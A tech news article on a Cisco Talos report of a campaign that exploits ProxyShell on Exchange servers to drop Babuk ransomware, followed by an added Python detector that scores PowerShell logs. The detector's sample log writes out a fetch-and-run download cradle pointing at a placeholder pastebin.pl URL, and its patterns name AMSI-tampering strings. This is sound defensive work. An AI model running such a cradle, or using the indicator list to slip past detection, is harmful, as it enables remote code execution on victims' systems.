Microsoft Exchange servers are still under cyberattacks, so fix them now

Cybersecurity researchers have discovered a new malicious campaign that exploits the already patched ProxyShell vulnerabilities in Microsoft Exchange mail servers, as well as the Windows PetitPotam vulnerability, once again highlighting the importance of patching vulnerabilities in critical components. The campaign, which hunts for unpatched, vulnerable hosts on which to plant a variant of the Babuk ransomware, was discovered by researchers from the Cisco Talos threat intelligence group using telemetry from Cisco Secure products. "We rate it with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of the China Chopper web shell," the researchers share. According to the researchers, the campaign finds vulnerable servers primarily in the US, with smaller numbers of infections also occurring in the UK, Germany, Ukraine, Finland, Brazil, Honduras and Thailand.

Unusual infection chain

Researchers point out that the threat actor behind this campaign, referred to as Tortilla, uses a somewhat unusual infection chain. The actor first uses an intermediate unpacking module hosted on a pastebin.com clone called pastebin.pl. This intermediate unpacker is downloaded into memory before the final payload executes. Examining the attack, the researchers note that the downloader runs a hidden PowerShell command that connects to and retrieves another module from the actor's infrastructure, which appears to be hosted in Russia. The PowerShell command also performs an Antimalware Scan Interface (AMSI) bypass to evade endpoint protection before finally loading the Babuk ransomware. "The leak of the Babuk vendor and its source code in July has contributed to its widespread availability, even to less experienced ransomware operators like Tortilla," the researchers conclude, urging users to deploy defensive security measures in the early stages. Stay alert on your computers with the help of the best endpoint protection tools, and make sure you use the best backup software to recover your data.
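The traits described above (a hidden PowerShell window, a stage pulled from the pastebin.pl clone, in-memory execution and AMSI tampering) are the kind of signals a defender can score in PowerShell command-line or script-block telemetry. The script below is an added example written for this page; it is not code from the article or from Cisco Talos. The indicator patterns, their weights, the alert threshold and the sample log lines are all assumptions constructed for the example (the URL path is a placeholder), and the encoded-command handling shows why a detector must decode `-EncodedCommand` payloads before matching, since an encoded cradle otherwise only shows a hidden window and a Base64 blob.

```python
import base64
import re
from dataclasses import dataclass

# Indicator patterns modelled on the infection chain described in the article:
# hidden PowerShell window, download cradle, in-memory execution, the
# pastebin.pl clone and AMSI tampering. Names, patterns and weights are an
# assumption for this example, not Cisco Talos's detection content.
INDICATORS = {
    "hidden_window":   (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "encoded_command": (1, re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)),
    "download_cradle": (2, re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I)),
    "in_memory_exec":  (2, re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)),
    "pastebin_clone":  (3, re.compile(r"pastebin\.pl", re.I)),
    "amsi_tamper":     (3, re.compile(r"AmsiScanBuffer|amsiInitFailed|AmsiUtils", re.I)),
}
ALERT_THRESHOLD = 4  # assumed: a single weak hit never alerts on its own


@dataclass
class Finding:
    line_no: int
    hits: list
    score: int
    decoded: str = ""


def decode_encoded_command(cmd):
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or ""."""
    m = INDICATORS["encoded_command"][1].search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_command(cmd):
    """Match every indicator against the raw command AND its decoded payload."""
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded
    hits = sorted(name for name, (_, pat) in INDICATORS.items() if pat.search(text))
    score = sum(INDICATORS[name][0] for name in hits)
    return hits, score, decoded


def analyze_log(lines, threshold=ALERT_THRESHOLD):
    """Return a Finding for each command line whose score reaches the threshold."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits, score, decoded = score_command(line)
        if score >= threshold:
            findings.append(Finding(n, hits, score, decoded))
    return findings


# Constructed sample command lines (not real telemetry). Line 3 carries the same
# cradle as line 2, but Base64/UTF-16LE encoded the way -enc expects it.
_CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
           "'https://pastebin.pl/view/raw/PLACEHOLDER')")
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    'powershell.exe -NoProfile -Command "Get-Service MSExchangeTransport"',
    f'powershell.exe -w hidden -nop -c "{_CRADLE}"',
    f"powershell.exe -w hidden -enc {_ENCODED}",
    'powershell.exe -w hidden -c "... amsiInitFailed ... (AMSI tampering snippet redacted) ..."',
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score={f.score} hits={f.hits}")
        if f.decoded:
            print(f"  decoded payload: {f.decoded}")
```

Running the block flags lines 2, 3 and 4 and leaves the benign Exchange service query alone; the encoded line scores highest only because the decoded payload is searched too. In production the same scoring would be applied to PowerShell script-block logging (Event ID 4104) rather than to process command lines alone, since an AMSI bypass that succeeds leaves command-line telemetry as one of the few remaining signals.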